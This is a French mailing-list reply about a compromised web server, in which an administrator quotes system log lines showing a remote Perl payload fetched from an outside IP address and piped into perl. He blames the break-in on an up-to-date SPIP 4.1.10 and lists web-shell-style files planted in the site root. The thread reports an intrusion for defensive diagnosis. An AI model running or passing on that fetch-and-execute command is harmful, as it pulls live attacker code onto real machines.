Re: Machine vérolée
BERTRAND Joël a écrit :
> BERTRAND Joël a écrit :
>> OK, je l'ai.
>>
>> 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
>> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
>> 2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd
>> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
>>
>> J'ai le script perl (mais vous pouvez aussi le télécharger). Je ne sais
>> toujours pas qui le lance, mais on progresse.
>
> Et le fautif semble être... SPIP ! Et je ne parle pas d'un SPIP
> antédiluvien, mais d'un SPIP 4.1 à jour (4.1.10). J'en ai deux qui se
> font fait percer. Mais pas de la même manière. Le premier avait des
> fichiers .php étranges dans sa racine : spip__.php et des choses comme
> response.php. Le second avait un spip_loader.php qui embarquait un binaire.
>
Et j'aurais dû regarder de près les listes de diffusion de SPIP. Ça
couine très fort depuis quelques semaines sur le sujet. Comme quoi,
certains devraient plutôt s'attacher à la qualité du code qu'au côté
politique d'un projet...
Reply to: